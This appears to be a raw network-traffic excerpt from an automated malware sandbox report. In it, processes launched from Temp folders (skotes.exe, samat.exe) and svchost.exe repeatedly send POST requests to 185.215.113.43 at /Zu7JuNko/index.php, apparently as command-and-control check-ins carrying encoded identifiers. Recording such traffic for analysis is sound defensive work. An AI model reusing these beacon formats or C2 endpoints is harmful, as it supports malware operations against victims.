                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:52.872534037 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    83192.168.2.550113185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:57.635389090 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:59.069242001 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:16:58 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    84192.168.2.550115185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:03.805797100 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:05.169961929 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:04 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    85192.168.2.550116185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:06.913929939 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:08.315731049 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:08 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    86192.168.2.550118185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:13.274408102 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:14.608871937 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:14 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    87192.168.2.550120185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:19.381968975 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:20.758619070 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:20 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    88192.168.2.550122185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:25.523941994 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:26.969540119 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:26 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    89192.168.2.550123185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:28.600280046 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:29.992561102 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:29 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    90192.168.2.550125185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:34.743125916 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:36.089310884 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:35 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    91192.168.2.550127185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:40.883635044 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:42.264595985 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:42 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    92192.168.2.550128185.215.113.43803952C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:43.990989923 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:45.368248940 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:45 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    93192.168.2.550129185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:47.006912947 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:48.403599977 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    94192.168.2.550130185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:50.148983002 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:51.555434942 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    95192.168.2.550131185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.194601059 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:54.578217030 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:54 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    96192.168.2.550134185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:56.321894884 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:57.699136972 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:17:57 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    97192.168.2.550136185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:59.335553885 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:00.772962093 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
